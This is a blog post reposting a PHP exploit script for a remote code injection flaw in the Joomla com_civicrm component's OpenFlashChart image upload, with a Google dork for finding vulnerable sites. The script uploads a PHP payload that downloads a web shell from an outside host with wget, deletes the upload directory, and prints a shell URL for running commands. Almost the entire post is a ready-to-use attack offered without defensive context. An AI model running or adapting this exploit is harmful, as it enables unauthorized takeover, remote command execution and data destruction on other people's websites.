Kamis, 24 Desember 2015

2. Joomla component com_civicrm remote code injection vulnerability


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# Exploit Title: joomla component com_civicrm remode code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
  
<?php
    
# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit
# http://www.securityweb.org & http://www.security.biz.tr
# multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php
    
     
    
$options = getopt('u:f:');
    
if(!isset($options['u'], $options['f']))
die("\n        Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/    The full path to Joomla!
-f post.php             The name of the file to create.\n");
    
$url     =  $options['u'];
$file    =  $options['f'];
  
  
$shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";
$url   = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}";
  
    
$data      = '<?php
 system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");
 system("cp post.php ../../../../../../../tmp/post.php");
 system("cd ..; rm -rf tmp-upload-images");
 echo "by iskorpitx" ;
 fclose ( $handle );
 ?>';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
    
    
echo "        [+] Submitting request to: {$options['u']}\n";
    
    
$handle = curl_init();
    
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
    
$source = curl_exec($handle);
curl_close($handle);
    
    
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$shell}?cmd=system('id');\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}
     
?>
  
# 2CF4D1BF882F7547   1337day.com [2013-05-21]   C248C940C9C6067B #
Wasallam…
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)